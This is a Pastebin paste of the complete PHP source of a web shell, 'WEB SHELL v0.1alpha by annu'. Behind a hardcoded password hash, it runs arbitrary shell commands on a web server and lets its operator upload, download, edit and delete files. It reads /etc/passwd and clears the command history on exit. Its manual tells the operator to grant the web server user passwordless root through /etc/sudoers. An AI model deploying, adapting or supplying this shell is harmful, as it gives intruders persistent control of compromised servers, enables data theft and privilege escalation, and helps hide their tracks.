Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php // author : annu
- /* use sha512 */
- /* default password is annu */
- $password = "602934ae46b8e162bf200790e6a6bf5c8e960efc1d4adb7b7493a6a32757c28fbd4347a2a2d46f963581283b8da35a17aeda571824970905a4fb30d2132b00dc";
- /* DISABLE ERRORS */
- error_reporting(0);
- if (basename($_SERVER['REQUEST_URI']) == "favicon.ico") {$my_img = imagecreate( 48, 48 ); $background = imagecolorallocate( $my_img, 70, 180, 255 ); $text_colour = imagecolorallocate( $my_img, 115, 120, 121 ); imagestring($my_img, 8, 3, 13, "SHELL", $text_colour); imagesetthickness ( $my_img, 5 ); header( "Content-type: image/png" ); header("Content-Disposition:inline; filename=favicon.ico"); imagepng( $my_img ); imagecolordeallocate( $line_color ); imagecolordeallocate( $text_color ); imagecolordeallocate( $background ); imagedestroy( $my_img ); die; }
- if (basename($_SERVER['REQUEST_URI']) == "lined.css") {
- header('Content-Type: text/css');
- header("Content-Disposition:inline; filename=lined.css");
- echo ".linedwrap {border: 1px solid #c0c0c0;padding: 3px;}
- .linedtextarea {padding: 0px;margin: 0px;}
- .linedtextarea textarea, .linedwrap .codelines .lineno {font-size: 10pt;font-family: monospace;line-height: normal !important;}
- .linedtextarea textarea {padding-right:0.3em;padding-top:0.3em;border: 0;}
- .linedwrap .lines {margin-top: 0px;width: 50px;float: left;overflow: hidden;border-right: 1px solid #c0c0c0;margin-right: 10px;}
- .linedwrap .codelines {padding-top: 5px;}
- .linedwrap .codelines .lineno {color:#AAAAAA;padding-right: 0.5em;padding-top: 0.0em;text-align: right;white-space: nowrap;}
- .linedwrap .codelines .lineselect {color: red;}
- ";
- die;
- }
- if (basename($_SERVER['REQUEST_URI']) == "lined.js") {
- header('Content-Type: application/javascript');
- header("Content-Disposition:inline; filename=lined.js");
- echo "/**
- * jQuery Lined Textarea Plugin
- * http://alan.blog-city.com/jquerylinedtextarea.htm
- *
- * Copyright (c) 2010 Alan Williamson
- *
- * Version:
- * \$Id: jquery-linedtextarea.js 464 2010-01-08 10:36:33Z alan \$
- *
- * Released under the MIT License:
- * http://www.opensource.org/licenses/mit-license.php
- *
- * Usage:
- * Displays a line number count column to the left of the textarea
- *
- * Class up your textarea with a given class, or target it directly
- * with JQuery Selectors
- *
- * \$(\".lined\").linedtextarea({
- * selectedLine: 10,
- * selectedClass: 'lineselect'
- * });
- *
- * History:
- * - 2010.01.08: Fixed a Google Chrome layout problem
- * - 2010.01.07: Refactored code for speed/readability; Fixed horizontal sizing
- * - 2010.01.06: Initial Release
- *
- */
- (function(\$) {
- \$.fn.linedtextarea = function(options) {
- // Get the Options
- var opts = \$.extend({}, \$.fn.linedtextarea.defaults, options);
- /*
- * Helper function to make sure the line numbers are always
- * kept up to the current system
- */
- var fillOutLines = function(codeLines, h, lineNo){
- while ( (codeLines.height() - h ) <= 0 ){
- if ( lineNo == opts.selectedLine )
- codeLines.append(\"<div class='lineno lineselect'>\" + lineNo + \"</div>\");
- else
- codeLines.append(\"<div class='lineno'>\" + lineNo + \"</div>\");
- lineNo++;
- }
- return lineNo;
- };
- /*
- * Iterate through each of the elements are to be applied to
- */
- return this.each(function() {
- var lineNo = 1;
- var textarea = \$(this);
- /* Turn off the wrapping of as we don't want to screw up the line numbers */
- textarea.attr(\"wrap\", \"off\");
- textarea.css({resize:'none'});
- var originalTextAreaWidth = textarea.outerWidth();
- /* Wrap the text area in the elements we need */
- textarea.wrap(\"<div class='linedtextarea'></div>\");
- var linedTextAreaDiv = textarea.parent().wrap(\"<div class='linedwrap' style='width:\" + originalTextAreaWidth + \"px'></div>\");
- var linedWrapDiv = linedTextAreaDiv.parent();
- linedWrapDiv.prepend(\"<div class='lines' style='width:50px'></div>\");
- var linesDiv = linedWrapDiv.find(\".lines\");
- linesDiv.height( textarea.height() + 6 );
- /* Draw the number bar; filling it out where necessary */
- linesDiv.append( \"<div class='codelines'></div>\" );
- var codeLinesDiv = linesDiv.find(\".codelines\");
- lineNo = fillOutLines( codeLinesDiv, linesDiv.height(), 1 );
- /* Move the textarea to the selected line */
- if ( opts.selectedLine != -1 && !isNaN(opts.selectedLine) ){
- var fontSize = parseInt( textarea.height() / (lineNo-2) );
- var position = parseInt( fontSize * opts.selectedLine ) - (textarea.height()/2);
- textarea[0].scrollTop = position;
- }
- /* Set the width */
- var sidebarWidth = linesDiv.outerWidth();
- var paddingHorizontal = parseInt( linedWrapDiv.css(\"border-left-width\") ) + parseInt( linedWrapDiv.css(\"border-right-width\") ) + parseInt( linedWrapDiv.css(\"padding-left\") ) + parseInt( linedWrapDiv.css(\"padding-right\") );
- var linedWrapDivNewWidth = originalTextAreaWidth - paddingHorizontal;
- var textareaNewWidth = originalTextAreaWidth - sidebarWidth - paddingHorizontal - 20;
- textarea.width( textareaNewWidth );
- linedWrapDiv.width( linedWrapDivNewWidth );
- /* React to the scroll event */
- textarea.scroll( function(tn){
- var domTextArea = \$(this)[0];
- var scrollTop = domTextArea.scrollTop;
- var clientHeight = domTextArea.clientHeight;
- codeLinesDiv.css( {'margin-top': (-1*scrollTop) + \"px\"} );
- lineNo = fillOutLines( codeLinesDiv, scrollTop + clientHeight, lineNo );
- });
- /* Should the textarea get resized outside of our control */
- textarea.resize( function(tn){
- var domTextArea = \$(this)[0];
- linesDiv.height( domTextArea.clientHeight + 6 );
- });
- });
- };
- // default options
- \$.fn.linedtextarea.defaults = {
- selectedLine: -1,
- selectedClass: 'lineselect'
- };
- })(jQuery);";
- die;
- }
- /* FUNCTIONS */
- function ds($dir=''){if (!match("\/$", $dir)) $dir = $dir . "/";return $dir;}
- function line($line='') {return str_replace("\n","",$line); }
- function ip($value='') {if (!empty($_SERVER['HTTP_CLIENT_IP'])) {$ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {$ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } else {$ip = $_SERVER['REMOTE_ADDR']; } return $ip; }
- function ahash($text='', $salt='',$sum=0) {if (!is_int($sum)) {$sum = 0; } $md5_salt = md5($salt); $md5_text = md5($text); $hash = hash('sha512',$md5_salt . $md5_text); $data = array('md5_salt' => $md5_salt, 'md5_text' => $md5_text, 'hash'=>$hash); if (!$sum == 0) {$hash = preg_replace("/^(.{".$sum."}).*/i", '$1', $hash); } return $hash; }
- function ex($cmd='') {return shell_exec("$cmd 2>&1"); }
- function exl($cmd='') {return line(ex("$cmd"));}
- function a($text='',$link = '') {return "<a href = '$link'>$text</a>"; }
- function me($get='') {if($get!=''){$get = "?$get";}return $_SERVER['PHP_SELF'].$get; }
- function noslash($dir='') {return replace("\/$","",$dir); }
- function root($path='') {if(!match("^\/",$path))$path = "$GLOBALS[active_dir]$path";return $path; }
- function backslashes($text='') {$arr = array("/"," "); foreach ($arr as $key => $value) {$text = str_replace($value, "\/", $text); } return $text; }
- function readf($file='') {$myfile = fopen($file, "r"); $read = fgets($myfile); fclose($myfile); return $read; }
- function writef($file='',$text='') {$myfile = fopen($file, "w"); fwrite($myfile, $text); fclose($myfile); return true; }
- function isexists($file=''){$is_exists= "\#!/bin/bash\nif test -f \"$file\"\n then\n echo 1\n else\n echo 0\n fi\n"; return exl("chmod 755 $is_exists; ".root($is_exists)); }
- function iswriteable($file=''){$is_writeable= "\#!/bin/bash\nif test -w \"$file\"\n then\n echo 1\n else\n echo 0\n fi\n"; return exl("chmod 755 $is_writeable; ".root($is_writeable)); }
- function isreadable($file=''){$is_readable= "\#!/bin/bash\nif test -r \"$file\"\n then\n echo 1\n else\n echo 0\n fi\n";return exl("chmod 755 $is_readable; ".root($is_readable)); }
- function isdir($file=''){$is_dir= "\#!/bin/bash\nif test -d \"$file\"\n then\n echo 1\n else\n echo 0\n fi\n";return exl("chmod 755 $is_dir; ".root($is_dir)); }
- function replace($pattern='',$replacement = null, $subject = null,$delimitter='ims') {$pattern = str_replace("\/", "/", $pattern); $pattern = backslashes($pattern); return preg_replace("/$pattern/".$delimitter, $replacement, $subject); }
- function match($pattern='',$subject = null,$delimitter='ims') {$pattern = str_replace("\/", "/", $pattern); $pattern = backslashes($pattern); return preg_match("/$pattern/".$delimitter, $subject); }
- function whattype($file=''){if(isexists($file)) {$shell = "file -i \"".root($file)."\""; $ex = exl($shell); $type = preg_replace("/[^\040]+:\040([a-z]+\/[a-z-_]+).+/i","$1", $ex); return $type; }}
- function gwords($array_words='',$c_words =0){$c_word = count($array_words); $c_wordss = $c_word-$c_words; $c_words; $_words = array(); var_dump($array_words); for ($i_wordss=0; $i_wordss <= $c_wordss; $i_wordss++) {for ($i_words=0; $i_words <= $c_words; $i_words++) {$word_position = $i_words + $i_wordss; $_words[$i_wordss] .= $array_words[$word_position] ." "; } } return $_words; }
- function tfile($file){;$tmp_path = $GLOBALS['tmp_path'];return replace("\/$","",$tmp_path) . ahash(basename($file).".".basename($file),"nametmp",22); }
- function tsess($file){$sess_path = $GLOBALS['sess_path'];return replace("\/$","",$sess_path) . ahash(basename($file).".".basename($file),"namesess",22); }
- function islinkin($file='',$target=''){$shell = "\#!/bin/bash\n if [ \"$file\" -ef \"$target\" ];then\n echo 1\n else\n echo 0\n fi\n "; return exl($shell); }
- function formlogin(){echo "<form action='' method='post'>WEB SHELL by annu :: <input type='password' name='".ahash("password",date("YmdH"))."' placeholder='password'><button type='submit'>login</button></form>"; die; }
- /* EXTERNAL COMMAND */
- function mycmd($command = null){
- $arr = array(
- "open"=>"open",
- "download"=>"download",
- "down"=>"download",
- "new"=>"new",
- );
- $att = null;
- $cmd = null;
- /* DOWNLOAD */
- $download = function ($file = '') use ($att){
- $tmp_path = $GLOBALS['tmp_path'];
- $tmp_dir = $GLOBALS['tmp_dir'];
- $active_dir = $GLOBALS['active_dir'];
- $script_path = $GLOBALS['script_path'];
- $script_path_http = $GLOBALS['script_path_http'];
- $messages = null;
- $method = $GLOBALS['tmp_method'];
- $ln_messages = null;
- $cp_messages = null;
- /* GET FILE NAME */
- $name = replace("([^\/]+)$", "$1", $file);
- /* GET FILE TYPE */
- $type = whattype($file);
- /* SET FALSE */
- $ok = false;
- /* CHECK ON TMP FILE */
- if (file_exists(tfile($name)))$ok = true;
- else{
- /* TRY TO LINK */
- $ln_shell = "cd $active_dir && ln $file " . ($script_path.tfile($name));
- $ln_messages = exl($ln_shell);
- /* IF THERE IS AN ERROR THEN TRY CP */
- if ($ln_messages != null) {
- $ln_messages = "\n>> $ln_messages";
- $ln_messages .= "\n>> trying plan B :: copy file to $tmp_dir";
- $ok = false;
- $cp_shell = "cd $active_dir && cp $file " . ($script_path.tfile($name));
- $cp_messages = exl($cp_shell);
- if ($cp_messages != null) {
- $ok = false;
- $cp_messages = "\n>> $cp_messages";
- $cp_messages .= "\n>> failed to download";
- }
- else $ok = true;
- }
- else $ok = true;
- }
- $messages = $ln_messages . $cp_messages;
- /* OK DOWNLOAD IT */
- if ($ok==true) {
- header('Content-Type: $type');
- header("Content-Disposition: attachment; filename=$name");
- header('Connection: Keep-Alive');
- header('Expires: 0');
- header('Pragma: public');
- readfile(tfile($name));
- die;
- }
- else $GLOBALS['messages'] = "\n$messages\n";
- };
- /* OPEN */
- $open = function ($file = '') use ($att){
- $tmp_path = $GLOBALS['tmp_path'];
- $tmp_dir = $GLOBALS['tmp_dir'];
- $active_dir = $GLOBALS['active_dir'];
- $script_path = $GLOBALS['script_path'];
- $script_path_http = $GLOBALS['script_path_http'];
- $messages = null;
- /* GET */
- $array['filename']= basename($file);
- $array['file']= $file;
- $array['tmpname']= basename(tfile($file));
- $array['tmp']= tfile($file);
- $array["date"]= exl("date -r \"".root($file)."\"");
- $array["type"]= whattype($file);
- $array["exists"]= isexists($file);
- $array["writeable"]= iswriteable($file);
- $array["readable"]= isreadable($file);
- $array['link']= root($file);
- /* IF READ ABLE */
- if ($array['readable'] == 1) {
- /* CHECK TMP */
- if (isexists($array['tmp'])) {
- if (1 == islinkin($array['tmp'],$file)) {
- $rm = exl("rm $array[tmp]");
- $ln_messages = exl("ln -s ".root($file)." $array[tmp]");
- }
- else{
- $rm = exl("rm $array[tmp]");
- $ln_messages = exl("ln -s ".root($file)." $array[tmp]");
- }
- }
- else{
- $rm = exl("rm $array[tmp]");
- $ln_messages = exl("ln -s ".root($file)." $array[tmp]");
- }
- /* TEXT */
- $messages .= "\n>> filename : $array[filename] | type : $array[type]";
- $messages .= "\n>> modificated : $array[date] | writeable : $array[writeable]";
- }
- else {
- $messages = "\n>> the $array[file] is not readable or not exists.";
- }
- writef(tsess("open$file"),json_encode($array));
- return $messages;
- };
- $new = function ($file = null) use($att){
- $messages = null;
- $tmp_path = $GLOBALS['tmp_path'];
- $tmp_dir = $GLOBALS['tmp_dir'];
- $active_dir = $GLOBALS['active_dir'];
- $script_path = $GLOBALS['script_path'];
- $script_path_http = $GLOBALS['script_path_http'];
- $messages = null;
- if (basename($file) == $file){
- $dir = $active_dir;
- }
- else{
- $dir = replace("^(.+)[^\/]$","$1",$file);
- }
- $array['file'] = $file;
- $array['filename'] = basename($file);
- $array['writeable'] = 1;
- $ok = 1;
- if(!isexists($file)){
- $array['exists'] = 0;
- if(!iswriteable($dir)){
- $messages .= "\n>> the directory is not writeable";
- $array['writeable'] = 0;
- $ok = 0;
- }
- }
- else{
- $messages .= "\n>> the $array[filename] is exists";
- $array['exists'] = 1;
- $ok = 0;
- }
- if ($ok==1) {
- $messages .= "\n>> filename : $array[filename] | directory : $dir";
- }
- writef(tsess("new$file"),json_encode($array));
- return $messages;
- };
- /* GET CMD AND ATT */
- foreach ($arr as $key => $value) {
- $command = htmlspecialchars($command);
- if (match("^\!(".$key.")", $command)) $cmd = $value;
- $att = replace("^\!".$key."\s(.+)", "$1", $command);
- if ($cmd != null)break;
- }
- if ($cmd != null) {$GLOBALS['command'] = $GLOBALS["list"]; return array("cmd" =>$cmd,"att"=>$att, "messages" =>${$cmd}($att));}
- else return false;
- }
- /* VARIABLE */
- $dirr= exl("pwd"); /* ACTIVE DIRECTORY */
- $me= exl("whoami"); /* WHO AM I */
- $home_path = ds(exl("awk -F: -v v='".$me."' '{if ($1==v) print $6}' /etc/passwd")); /* HOME PATH */
- $script_path = replace("[^\/]+$", "", $_SERVER['SCRIPT_FILENAME']); /* SCRIPT PATH */
- $script_path_http = replace("[^\/]+$", "", $_SERVER['SCRIPT_NAME']); /* SCRIPT PATH ON HTTP */
- $http_root = $_SERVER['DOCUMENT_ROOT']; /* HTTP ROOT */
- $command = $cd = $sess = $messages = $mv_messages = $html = $updated = $pwd = $ok = $respon = $funRUN = null; /* SET NULLS */
- $get = isset($_GET)?$_GET : array();
- $command = ($command_real = isset($get['cli'])?$get['cli']:null);
- /* CONFIG VARS */
- $sess_dir = $tmp_dir = ds("dsbuf9e0-tmp/"); /*SET TMP DIR AND SESSIONS DIR*/
- $arr =
- array(
- /* alias */
- "~" => noslash($home_path),
- "!and" => "&&",
- "!home" => noslash($home_path),
- "!php" => noslash($script_path),
- "!bs" => "\\",
- "!s" => "\/",
- "!h" => "#",
- "!a" => "\?"
- );
- $list = "ls -lap"; /* LIST DEFAULT */
- $valid_access = 3600; /* HOW LONG SESSION FILES WILL USED & TMP FILES WILL AVIALABLE */
- $tmp_method = "ln";
- /* START HERE */
- $command_real = $command;
- if (!is_dir($sess_dir)) {mkdir($sess_dir); }
- if (!is_dir($tmp_dir)) {mkdir($tmp_dir); }
- $sess_path = $sess_dir ."sess". ahash(ip(),"dir",6);
- $tmp_name = "tmp". ahash(ip(),"file",6);
- $tmp_path = $tmp_dir . "tmp". ahash(ip(),"file",6);
- /* GETTING COMMANDS */
- if ($command == null) /* IF NO COMMAND THEN LIST */
- $command_real = $command = $list;
- if (isset($_GET['exit'])){ /* EXIT AND DELETING SESSION */
- $x = exl("rm $sess_path* | rm $tmp_path* | history -c");
- }
- /* ALIASES */
- foreach ($arr as $key => $value) {$command = replace("$key", $value, $command); }
- /* CHECKING SESSION */
- // echo hash("sha512",$password);
- if (isset($_POST[ahash("password",date("YmdH"))])) {
- if (hash("sha512",$_POST[ahash("password",date("YmdH"))]) == $password) {
- writef(tsess("cd"),$active_dir);
- }
- else{
- echo "login failed";
- }
- }
- if (file_exists(tsess("cd"))) {
- $updated = date("Y-m-d H:i:s.", filemtime(tsess("cd")));
- $updated = strtotime($updated);
- $now = strtotime(date("Y-m-d H:i:s"));
- $now;
- $diff = $now - $updated;
- if ($diff < $valid_access) {
- $cd = readf(tsess("cd"));
- }
- else{
- $cd = $dirr;
- $remove_old_session_and_tmp = exl("rm $sess_path* | rm $tmp_path*");
- formlogin();
- }
- }
- else {formlogin();}
- /* CREATING ACTIVE DIRECTORY AND GENERATING CD COMMAD */
- $active_dir = ds(line($cd == null?$dirr:"$cd"));
- $cd_command = "cd $active_dir";
- /* GENERATING PWD COMMAND */
- $pwd = "echo '___PWD'; pwd; echo 'PWD___'";
- /* SHELL SCRIPT */
- $shell_script = tfile("shell_script");
- /* REMOVE THE LAST SHELL SCRIPT */
- $rm = ex("rm $shell_script");
- /* CREATING TMP SHELL FILE */
- //$command = preg_replace("/(\\))/i", "\\\\", $command);
- $exec_ = "$cd_command;$command".($command==null?"":"; ")."$pwd";
- writef($shell_script,$exec_);
- /* RUN CHMOD */
- $chmod = ex("chmod 755 $shell_script");
- $new_command_ = $command;
- preg_match_all('/([^&;\|]+)/i', $command, $result);
- /* POST */
- /* UPLOAD */
- if (isset($_FILES["fileToUpload"])) {
- $name = basename($_FILES["fileToUpload"]["name"]);
- $name = $_POST['name']!=null?$_POST['name']:$name;
- if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], tfile("upload".$name))) {
- $messages .= "\n>> the file ". $name. " has been uploaded to $tmp_dir. tmp name : ".basename(tfile("upload".$name));
- if (isexists("$active_dir$name") == 0) {
- /* TRY TO LINK */
- $ln_shell = "ln ".tfile("upload$name")." ". root($name);
- $ln_messages = exl($ln_shell);
- /* IF THERE IS AN ERROR THEN TRY CP */
- if ($ln_messages != null) {
- $ln_messages .= "\n>> $ln_messages";
- $ln_messages .= "\n>> trying plan B :: moving file from $tmp_dir";
- $ok = false;
- $mv_shell = "mv ".tfile("upload$name")." ". root($name);
- $mv_messages = exl($mv_shell);
- if ($mv_messages != null) {
- $ok = false;
- $mv_messages .= "\n>> $mv_messages";
- $mv_messages .= "\n>> failed to moving file";
- }
- else $ok = true;
- }
- else $ok = true;
- $messages .= $ln_messages . $mv_messages;
- if ($ok ==false) $messages .= "\n>> you can move it from $tmp_dir";
- }
- else $messages .= "\n>> file is exists, you can move it from $tmp_dir";
- }
- else $messages .= "\n>> sorry, there was an error uploading your file";
- if ($ok == 1) $messages .= "\n>> the file $name has been moved to $active_dir$name";
- }
- if (isset($_POST)) {
- /* TEXT */
- if (isset($_POST['text'])) {
- if ($_POST['act'] == "open") {
- if (isset($_POST['file'])) {
- # code...
- $json = json_decode(readf(tsess("open".$_POST['file'])));
- if(isset($json->file)){
- $backup =exl ("cp ".$json->file." " .tfile("backup" . $json->filename));
- if (isexists(tfile("backup".$json->filename)))
- $messages .= "\n>> backup file has been written [".tfile("backup".$json->filename)."]";
- else
- $messages .= "\n>> ".$backup;
- /* SAVE */
- writef($json->tmp,($_POST['text']));
- }
- else{
- $messages .= "\n>> no data!!!";
- }
- }
- }
- elseif($_POST['act']="new"){
- $json = json_decode(readf(tsess("new".$_POST['file'])));
- /* create file */
- $createfile = exl("echo \"".htmlspecialchars($_POST['text'])."\" > ". $json->file);
- if($createfile==null){
- header("location:?cli=!open ".$json->file);
- }
- else{
- $messages .= ">>\n$createfile";
- }
- }
- /* BACK UP!!! */
- }
- }
- /* TAKE OVER IF THERE IS AN EXTERNAL COMMAND */
- $respon = mycmd($command);
- if (is_array($respon)) {$shell_script = null;$messages .= $respon['messages'];}
- /* EXCUTE SHELL */
- $out = ex($shell_script);
- /* GETTING THE LAST ACTIVE DIRECTORY */
- $last_dir = line($out);
- if (match("(.*)___PWD(.+)PWD___", $last_dir)) $last_dir = replace("(.*)___PWD(.+)PWD___", "$2", $last_dir);
- else $last_dir = $active_dir;
- // echo "\n$last_dir";die;
- /* STORE ACTIVE DIRECTORY TO SESSION FILE */
- writef(tsess("cd"),$last_dir);
- $active_dir = ds($last_dir);
- /* DELETING PWD OUTPUT */
- $out = replace("(.*)___PWD.*PWD___", "$1", $out);
- /* HTML */
- $text = $text_ = $renameup = null;
- if (is_array($respon)) {
- if ($respon['cmd'] == "open") {
- # code...
- $json = json_decode(readf(tsess("open$respon[att]")));
- if ($json->readable == 1) {
- $text_ = ex("cat ". $json->tmp);
- if (match("(text|inode).*",$json->type)) {
- $text = "
- <form action='?cli=!open ".$json->file."' method='post'>
- <button type='submit' float:left' ".($json->writeable==0?"disabled='disabled'":null).">SAVE</button>
- <input type='hidden' name='file' value='".$json->file."'>
- <input type='hidden' name='act' value='open'>
- <a href='?cli=rm ".$json->file."' target='_blank'><button ".($json->writeable==0?"disabled='disabled'":null)." onclick='window.location=\"?cli=rm ".$json->file."\";return false;'>DELETE</button></a>
- <textarea id='lined' class='lined run' name = 'text' style='width:95%;height:65%'>".htmlspecialchars($text_)."</textarea>
- </form>
- ";
- }
- if (match("image.*",$json->type)) {$renameup=1;
- $text = "
- <a href='?cli=rm ".$json->file."' target='_blank' >
- <button onclick='window.location=\"?cli=rm ".$json->file."\";return false;' ".($json->writeable==0?"disabled='disabled'":null).">DELETE</button></a>
- <a target='_blank' href='".$json->tmp."?name=".$json->filename."'><img style='max-width:100%' src='".$json->tmp."'></a>";
- }
- }
- }
- elseif($respon['cmd']=="new"){
- $json = json_decode(readf(tsess("new$respon[att]")));
- $text = "
- <form action='' method='post'>
- <button type='submit' float:left'>SAVE</button>
- <input type='hidden' name='file' value='".$json->file."'>
- <input type='hidden' name='act' value='new'>
- <textarea id='lined' class='lined run' name = 'text' style='width:95%;height:65%'></textarea>
- </form>
- ";
- if ($json->exists || !$json->writeable == 1) {
- $messages .= "\n\n".ex("cd $active_dir; " . $list);
- $text = null;
- }
- }
- }
- $htmlhead = "<link rel=\"shortcut icon\" href=\"$_SERVER[SCRIPT_NAME]/favicon.ico\">";
- $htmlhead .= "<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js'></script>";
- $htmlhead .= "<script src=\"$_SERVER[SCRIPT_NAME]/lined.js\"></script>";
- $htmlhead .= "<link href=\"$_SERVER[SCRIPT_NAME]/lined.css\" type=\"text/css\" rel=\"stylesheet\" />";
- $title = "WEB SHELL V0.1alpha";
- $head ="<span><b>WEB SHELL v0.1alpha by annu</b></span>";
- $link = a("index",me())." | " . a("exit","?exit");
- $conn = "<span>$me@$_SERVER[SERVER_NAME]/$_SERVER[SERVER_ADDR] by " . ip() ."</span>";
- $current_dir = "<span>$active_dir</span>";
- $upload = "
- <form action='?cli' method='POST' enctype='multipart/form-data' style='float:left;width:40%'>
- <input type='file' style='width:50%' name='fileToUpload' id='fileToUpload'>
- <input style='width:30%' class='stopfocus' type='text' name = 'name' placeholder='rename' value='".($renameup != null ? $json->filename:null)."'>
- <input type='submit' value='GO' name='submit'>
- </form>";
- $cli = "
- <form action='' style='float:left;width:60%'>
- <input
- autofocus
- type='text'
- id='cli'
- name = 'cli'
- style='width:100%'
- placeholder='type your command here || ENTER -> list files and directories || !down[load?] FILE || !open FILE
- '>
- </form>";
- $clearboth = "<div style='clear:both'></div>";
- $man = "<pre>
- [USER]@[HOST]/[IP SERVER] by [YOUR IP]
- [ACTIVE DIRECTORY]
- additional commands:
- !down[load?] FILE => download file [all file types]
- !open FILE => open file [text,image]
- !new FILE => create new file [text]
- aliases:
- ~ = home directory
- !s = /
- !bs = \
- !h = #
- !a = ?
- !and = &&
- !home = home directory
- !php = this script directory
- you can add aliases by editing this script
- notes:
- - shell_exec() must be enabled
- - directory must be writeable
- - for ubuntu can use sudo mode by type : echo 'PASSWORD' | sudo -S COMMAND
- ; make sure your user is in sudo group
- ; if you are www-data then you have to edit /etc/sudoers and add this line: www-data ALL=(ALL) NOPASSWD: ALL
- then you dont have to use password, just type: sudo COMMAND
- tested on:
- Ubuntu 14.04
- </pre>";
- /* WORKING WITH OUTPUT */
- $out = (line($out)==null) ? $out =htmlspecialchars(ex("$list $active_dir")) : $out;
- $shell_script =backslashes($shell_script);
- $out = replace("$shell_script:(\040[0-9]+:)?(\040$shell_script:)*", "", $out);
- $out = "<pre>>> $command_real$messages
- \n$out</pre>";
- $open = "<pre>$messages</pre>$clearboth$text";
- /* ROUTES */
- if (isset($_GET['cli'])) {
- if (is_array($respon))
- $content = $open;
- else
- $content = $out; }
- else $content = $man;
- /* HTML OUTPUT */
- $PRINT = "
- <html>
- <head>
- <title>$title</title>
- $htmlhead
- </head>
- <body style='width:100%'>
- <div id ='head'>
- $head $link<br>
- $conn<br>
- $current_dir<br>
- </div>
- <br>
- $clearboth
- $cli$upload
- $clearboth
- $content
- </body>
- </html>
- <script>
- document.getElementById(\"cli\").focus();
- document.onkeypress = function (e) {var x = document.activeElement.parentElement.nodeName; if (x != (\"FORM\")) {if(!document.activeElement.className.match(\"run\")){document.getElementById(\"cli\").focus();}; }; };
- document.onkeydown = function (x){if(event.keyCode==8 || event.keyCode==13) {var x = document.activeElement.parentElement.nodeName; if (x != \"FORM\") {if(!document.activeElement.className.match(\"run\")){document.getElementById(\"cli\").focus(); return false; };}; }; };
- $(function() {
- $('.lined').linedtextarea(
- {selectedLine: 0}
- );
- });
- </script>";
- echo $PRINT;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement